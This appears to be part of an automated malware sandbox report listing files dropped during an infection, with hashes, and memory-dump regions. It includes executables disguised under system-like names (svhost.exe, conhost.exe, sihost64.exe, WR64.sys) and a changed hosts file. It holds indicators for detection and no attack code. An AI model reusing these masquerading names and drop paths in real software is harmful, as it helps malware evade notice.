262fc9e9cddee9ae3c733bb961f44f27628783961db101aabc868765ba0e2aafdcb8f9b689f1abd4613836ed9cf3064e92cbd10495c83fe04dd2a496db3485d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CY2jVj7cNu8l.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
fcbfea2bed3d0d2533fe957f0f83e35c

SHA1
70ca46e89e31d8918c482848cd566090aaffd910

SHA256
e97f54e5237ffeca4c9a6454f73690b98ac33e03c201f9f7e465394ecbc3ea38

SHA512
d382453207d961f63624ba4c5a0dea874e6b942f5cad731c262a44371fb25b309eacf608156e0234169e52337796128312e72edb0290c48f56104fe5e52509a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
43b2acc13ba1fe53d4f8859fe4f98cfd

SHA1
d917f316b17b600053802c3133dae8c2466a7f41

SHA256
b6630b73e4df2c36854f9480fe321ceb44fe45103d74a509c6d616c120509186

SHA512
8851c9fb935dfa61345903ec7ec859779a98c0fd40bd5ad8f2a103f68b59ee3e7527664cb44fb0b3b17fd21977ed554e9b0aca0b1c8fec8d51b565a29d48d5e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cd5b2555a0e703bc746e242654a09c2f

SHA1
4021bfba22c0fce16709bfa6140d11272b7bd8b4

SHA256
73679042b477828c6c8400590ca1434f5f6b7379aede1442f80bb9ede3bc7811

SHA512
404a94bbc1cbcf98dba90160ab65a8acc5a1660d801bf7425ab1fe641599bda1b6494d4d6b65c6584e4ca6c1dea4b1acfde88e4a6d216194dca3b6ae6ca605f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3686ade661a056c050453c8cc79f5d91

SHA1
ea237f25738087e7b86b576d2f1311eaea6f5fd2

SHA256
eaf3ce900fc5f1c184b7d75a24056d0fb431d8bc7ea4e06b14b067fb642c074e

SHA512
0a8b9082226909077cc078e906799b626e62a1725da9919a0f2df2dea0e4ac69a312617260a877e3b55dc313889b08249fc13fa3ec62956576f429ef5079dda8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
050578bcbe71fcf8467e66dd700f1a0b

SHA1
edc182f324a85f530077aff358c2b5269b088fc1

SHA256
ac02bf4fb18fffdf076eb0ef1169af67cbcb1306a009f4821f3b8546764b4a50

SHA512
f0ba63e42038eaf1017367674ad0dde48e7f39e1473680247027b07cf7aa03562cc52b9f91b1f63eaa684235f42d78761e522cacaad2a4fac9f1e8f96685d381

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
781da0576417bf414dc558e5a315e2be

SHA1
215451c1e370be595f1c389f587efeaa93108b4c

SHA256
41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe

SHA512
24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d1a79640b4fbfefe2173b565a2aed3af

SHA1
faba0a328aaa9578c787bcf082fb992fe399d2f9

SHA256
a4fb105e4bc4a88f5602481a094b7eac39bb5ed58358630a3ffee0c550ea9afe

SHA512
dce1d0e09d0edc99b4ae8abdfe52ec1901fd4a6071e437afb7d230644b6ecf6ce197f3c87ab09543bae7be175c0d0e909d5dccfd5118b2e2060cd3bee7e64575

Download Submit
C:\Users\Admin\AppData\Local\Temp\._cache_Maple.exe

Filesize
227KB

MD5
550b445ad1a44d1f23f7155fae400db6

SHA1
cb006a53156285fdef3a0b33a4a08f534cd3bab7

SHA256
d223b3918e8bc3bab1d23fdc2e306be1c6587d3ab8f324fc377e37585387884e

SHA512
909f31f24672ffc5542ac42f344eb6020bcdfdfac9ac13d5672fe7ed22e686b06385d15709f1f83b576b1dade591ad40eb429ef076d07f4597235cd95a679fa5

Download Submit
C:\Users\Admin\AppData\Local\Temp\._cache_Server.exe

Filesize
71KB

MD5
f9b08bd21b40a938122b479095b7c70c

SHA1
eb925e3927b83c20d8d24bdab2e587c10d6ac8cd

SHA256
c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8

SHA512
fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\2fxLx7tnC6sWi72

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\ABF75E00

Filesize
24KB

MD5
9d0fc42725645533053c3cb90c387833

SHA1
94b0f80f5a80bc281bc5b1771255f7988dd4d021

SHA256
b95476fc5f40a1712c4184b5b6be6d3f61d729f685cadc6fe2e7c5b31a01ae1a

SHA512
ac6cfff03467e6b62a561b0ac28ab013115a6fc1afe50bac66773193e34d9433b1b054185f100ef79b9ac99cf276759429da31286d6eb600686e1bc9eca74c59

Download Submit
C:\Users\Admin\AppData\Local\Temp\FEsuMv4ocuTTY0F\Display\Display.png

Filesize
240KB

MD5
95c43d547a2e79a82249d69f055f7ebd

SHA1
560e83d43daf302e6cedf33b80a56148997fc20a

SHA256
92a5dd8979f695eac31a8e4bcbc739872a73099978af63e80d8a2878494997d7

SHA512
585cf0333f8fed23cfe86b432f2f83285fe988dd2f824b2c39a71c7c899d00bd4ed1257145271ce74359c841b40181c331c98f1e809afce3dbf846bc009d3ab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Maple.exe

Filesize
972KB

MD5
8d1e32a98205dcaa9243c936cb1887b0

SHA1
bee2f62b849be514d8430ed14ec76511662c5787

SHA256
c0184680acf73a618f544cae5c53db114b52fd8d5365445f8fe17fb42380f464

SHA512
f952e61b52271d6103695a68265eaa6d9fcd76623c21098ca292529e44079e51f6427c5ae1e33c04cd1e7b0f16cb748f43fe0a94ae4fd73b58703631a74f9569

Download Submit
C:\Users\Admin\AppData\Local\Temp\OM8lB64pA0e0iRF

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Server.exe

Filesize
816KB

MD5
ec276db441be3263cdb6d4f111f0d280

SHA1
3ea0579b57b146218faba01bb47569b948477357

SHA256
2ecfecfc29a00926c8c2a97847483641536f0623cf0b9bd405bf92bc6fdd410d

SHA512
833bf7fe588d991d5d1d7b135f9334e6e6f5b758b4fd3d5abecc016076f0f1cea46a82abe9ca48e11037821f578262998fc5c231b82c83d1426d09c81f103492

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rdjvqm3q.1hh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\aSoNABxN0RUD2Zw

Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\Users\Admin\AppData\Local\Temp\g92kdbfD.xlsm

Filesize
17KB

MD5
e566fc53051035e1e6fd0ed1823de0f9

SHA1
00bc96c48b98676ecd67e81a6f1d7754e4156044

SHA256
8e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15

SHA512
a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04

Download Submit
C:\Users\Admin\AppData\Local\Temp\k3KBO5Eq9uRVilR

Filesize
46KB

MD5
14ccc9293153deacbb9a20ee8f6ff1b7

SHA1
46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

SHA256
3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

SHA512
916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

Download Submit
C:\Users\Admin\AppData\Local\Temp\svhost.exe

Filesize
29.7MB

MD5
56b4fe3ecc9dc74c809bfa4e1c7f3a93

SHA1
e141bf39b4a39df5b538c7cf611f137c1d41b514

SHA256
1c931204ae52430228c8a870f142c73828bd9501cdb6174221ca06d2eac8967a

SHA512
842c11149c724a645d4bec212155126395a73e79045d9775c3329eab24cc8a3b80aaf204855b19ce17daaa42d9d5e4deb1e99077746a79eb4e1972dfc2884367

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\WR64.sys

Filesize
14KB

MD5
0c0195c48b6b8582fa6f6373032118da

SHA1
d25340ae8e92a6d29f599fef426a2bc1b5217299

SHA256
11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5

SHA512
ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
30KB

MD5
c875c2510c097504d9da0db61f25c00a

SHA1
d11a240808aa7c05d42878a887509482c374727f

SHA256
02a26d3f4499deffe524b8aad53ec1eb84367bbbe1a4d31337f2cb6c6eb082d8

SHA512
5eba15406a2bd53118b8f6355ce1f5612aa3897fd9b0dd98fd73ad42172042ce1ad4fff716533b70848d8c0d057d00a94a181e5b80a7c8989f3a10435b3b0b24

Download Submit
C:\Users\Admin\AppData\Roaming\Server.exe

Filesize
23KB

MD5
32fe01ccb93b0233503d0aaaa451f7b2

SHA1
58e5a63142150e8fb175dbb4dedea2ce405d7db0

SHA256
6988ee719a54c93a89303dcff277c62ae4890274cc45f074bc7effde315fbf43

SHA512
76945f23a49d594e325d80ffc0570341044ac0b97bd889c92f90bc56d3cdff5c1b29178be4f157c8c1bb9ce7cc311765309f2e6f7b08b24e7acf983ea67635a6

Download Submit
C:\Users\Admin\AppData\Roaming\conhost.exe

Filesize
37KB

MD5
b37dd1a1f0507baf993471ae1b7a314c

SHA1
9aff9d71492ffff8d51f8e8d67f5770755899882

SHA256
e58e8918a443c0061add029f8f211f6551a130202195cc2b9b529ea72553e0bc

SHA512
ac76d5b10540eb292341f30c7abfd81f03be65f6655c814aba6ac6a0ecf4f0f2c34c3b8e63ceef8c4579f98b7459e51b9fdd30d601c6d1930860ab7c154da460

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/352-915-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/484-566-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/568-685-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/568-810-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/568-584-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/664-308-0x00007FFEC51B0000-0x00007FFEC51C0000-memory.dmp

Filesize
64KB

Download
memory/664-317-0x00007FFEC2D60000-0x00007FFEC2D70000-memory.dmp

Filesize
64KB

Download
memory/664-312-0x00007FFEC51B0000-0x00007FFEC51C0000-memory.dmp

Filesize
64KB

Download
memory/664-316-0x00007FFEC2D60000-0x00007FFEC2D70000-memory.dmp

Filesize
64KB

Download
memory/664-310-0x00007FFEC51B0000-0x00007FFEC51C0000-memory.dmp

Filesize
64KB

Download
memory/664-309-0x00007FFEC51B0000-0x00007FFEC51C0000-memory.dmp

Filesize
64KB

Download
memory/664-311-0x00007FFEC51B0000-0x00007FFEC51C0000-memory.dmp

Filesize
64KB

Download
memory/844-645-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/844-644-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/844-642-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/844-646-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/844-647-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/844-648-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/844-640-0x0000000140000000-0x0000000140786000-memory.dmp

Filesize
7.5MB

Download
memory/844-643-0x0000000001EB0000-0x0000000001ED0000-memory.dmp

Filesize
128KB

Download
memory/948-167-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/1000-434-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/1068-631-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/1356-166-0x0000000000590000-0x00000000005A8000-memory.dmp

Filesize
96KB

Download
memory/1984-684-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/2144-0-0x00007FFEE4123000-0x00007FFEE4125000-memory.dmp

Filesize
8KB

Download
memory/2144-1-0x0000000000370000-0x0000000004106000-memory.dmp

Filesize
61.6MB

Download
memory/2144-2-0x00007FFEE4120000-0x00007FFEE4BE2000-memory.dmp

Filesize
10.8MB

Download
memory/2144-87-0x00007FFEE4120000-0x00007FFEE4BE2000-memory.dmp

Filesize
10.8MB

Download
memory/2208-934-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/2260-546-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/2260-799-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/2316-227-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/2840-889-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/2976-775-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/3140-249-0x0000000000300000-0x0000000000310000-memory.dmp

Filesize
64KB

Download
memory/3176-706-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/3340-952-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/3404-465-0x000002316C910000-0x000002316C91A000-memory.dmp

Filesize
40KB

Download
memory/3404-365-0x000002316CC80000-0x000002316CCD0000-memory.dmp

Filesize
320KB

Download
memory/3404-466-0x000002316CBD0000-0x000002316CBE2000-memory.dmp

Filesize
72KB

Download
memory/3404-378-0x000002316CBB0000-0x000002316CBCE000-memory.dmp

Filesize
120KB

Download
memory/3404-364-0x000002316CC00000-0x000002316CC76000-memory.dmp

Filesize
472KB

Download
memory/3404-165-0x000002316A410000-0x000002316A450000-memory.dmp

Filesize
256KB

Download
memory/3448-632-0x00000184F58A0000-0x00000184F765E000-memory.dmp

Filesize
29.7MB

Download
memory/3448-628-0x00000184D5A30000-0x00000184D77EE000-memory.dmp

Filesize
29.7MB

Download
memory/3504-329-0x00000211DAB80000-0x00000211DABA2000-memory.dmp

Filesize
136KB

Download
memory/3768-845-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/3876-751-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/4064-825-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/4100-431-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/4292-667-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download
memory/4620-538-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/4720-774-0x000001D39E690000-0x000001D39E696000-memory.dmp

Filesize
24KB

Download
memory/4720-773-0x000001D39CB20000-0x000001D39CB26000-memory.dmp

Filesize
24KB

Download